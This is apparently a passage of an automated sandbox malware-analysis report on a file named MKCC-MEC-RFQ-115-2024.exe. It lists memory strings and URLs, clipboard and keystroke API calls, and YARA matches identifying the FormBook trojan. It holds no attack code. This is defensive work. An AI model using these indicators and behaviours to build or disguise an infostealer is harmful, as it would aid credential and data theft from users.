          Source: explorer.exe, 00000003.00000002.3885261844.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292171112.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1440884138.000000000BDFE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSJM
          Source: explorer.exe, 00000003.00000002.3885261844.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292171112.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1440884138.000000000BDFE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSZM
          Source: explorer.exe, 00000003.00000002.3885261844.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292171112.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1440884138.000000000BDFE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSp
          Source: explorer.exe, 00000003.00000003.3086041137.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438602211.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3881532572.0000000008796000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/rT
          Source: explorer.exe, 00000003.00000002.3881532572.0000000008632000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&oc
          Source: explorer.exe, 00000003.00000002.3881532572.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438602211.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3086041137.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?z$
          Source: explorer.exe, 00000003.00000003.3086041137.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438602211.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3881532572.0000000008796000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/~T
          Source: explorer.exe, 00000003.00000003.2291674421.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3089297174.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1435576590.0000000002F10000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000003.00000002.3881532572.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438602211.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3086041137.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
          Source: explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
          Source: explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-dark
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-dark
          Source: explorer.exe, 00000003.00000002.3885261844.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292171112.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1440884138.000000000BDFE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
          Source: explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1eBTmz.img
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AATs0AB.img
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1e6XdQ.img
          Source: systray.exe, 00000004.00000002.3877340789.000000000574F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://octagonal-waiter-408.notion.site/Notion-publish-test-5ffca584256043babdad0fd9159cb223?pvs=4
          Source: explorer.exe, 00000003.00000002.3885261844.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292171112.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1440884138.000000000BDFE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://parade.com/61481/toriavey/where-did-hamburgers-originate
          Source: explorer.exe, 00000003.00000002.3885261844.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292171112.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1440884138.000000000BDFE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000003.00000002.3882013964.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438602211.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290803241.000000000899E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/bat
          Source: explorer.exe, 00000003.00000002.3885261844.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292171112.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1440884138.000000000BDFE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-o
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/companies/kaiser-permanente-and-unions-for-75-000-striking-health-wo
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-whines-to-cameras-in-ny-fraud-case-before-fleeing-to-f
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-dist
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/england-considers-raising-smoking-age-until-cigarettes-are-bann
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/nobel-prize-in-literature-to-be-announced-in-stockholm/ar-AA1hI
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-expresses-worry-about-congressional
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.stacker.com/arizona/phoenix
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.yelp.com
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0015425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,1_2_0015425A
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00154458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_00154458
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0015425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,1_2_0015425A
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00140219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,1_2_00140219
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0016CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_0016CDAC

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1479792020.0000000002760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1479642617.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1432605564.0000000001890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1479901352.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
